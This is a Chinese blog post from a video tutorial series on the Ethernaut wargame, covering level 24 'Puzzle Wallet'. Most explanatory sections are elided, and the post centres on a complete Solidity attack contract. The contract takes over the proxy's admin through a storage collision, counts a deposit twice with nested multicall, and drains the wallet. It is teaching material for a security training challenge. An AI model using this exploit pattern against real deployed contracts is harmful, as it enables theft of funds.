# 智能合约黑客攻击 Ethernaut: 24. Puzzle Wallet By [Leek DEV](https://paragraph.com/@leekdev) · 2023-09-28 --- 本系列是由 [Leek DEV](https://twitter.com/LeekDEV) 编写的一个关于 [智能合约黑客攻击 Ethernaut](https://ethernaut.openzeppelin.com/) 系列的讲解视频,每个关卡都会有讲解视频和 [文档](https://mirror.xyz/leekdev.eth),可以从 [YouTube](https://www.youtube.com/@LeekDEV) 或者 [BILIBILI](https://space.bilibili.com/3493272831920239) 观看更加详细的讲解视频。 教程 -- * TikTok - …. * GitHub - [攻击代码](https://github.com/6boris) * Bilibili - [视频教程](https://space.bilibili.com/3493272831920239) * YouTube - [视频教程](https://www.youtube.com/@LeekDEV) 题目 -- … Hack思路 ------ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; interface IPuzzleWallet { function proposeNewAdmin(address _newAdmin) external; function addToWhitelist(address addr) external; function execute(address to, uint256 value, bytes calldata data) external payable; function deposit() external payable; function multicall(bytes[] calldata data) external payable; function setMaxBalance(uint256 _maxBalance) external; } contract PuzzleWalletHack { IPuzzleWallet public proxy; IPuzzleWallet public wallet; bytes[] depositData = [abi.encodeWithSignature("deposit()")]; bytes[] multicallData = [abi.encodeWithSignature("deposit()"), abi.encodeWithSignature("multicall(bytes[])", depositData)]; constructor(address _target) payable { proxy = IPuzzleWallet(payable(_target)); wallet = IPuzzleWallet(address(proxy)); } receive() external payable { } function attack() public payable { proxy.proposeNewAdmin(address(this)); wallet.addToWhitelist(address(this)); wallet.multicall{ value: msg.value }(multicallData); wallet.execute(address(this), msg.value * 2, bytes("")); wallet.setMaxBalance(uint256(uint160(msg.sender))); } } Hack案例 ------ … 防范思路 ---- … 参考资料 ---- …. --- *Originally published on [Leek DEV](https://paragraph.com/@leekdev/ethernaut-24-puzzle-wallet)*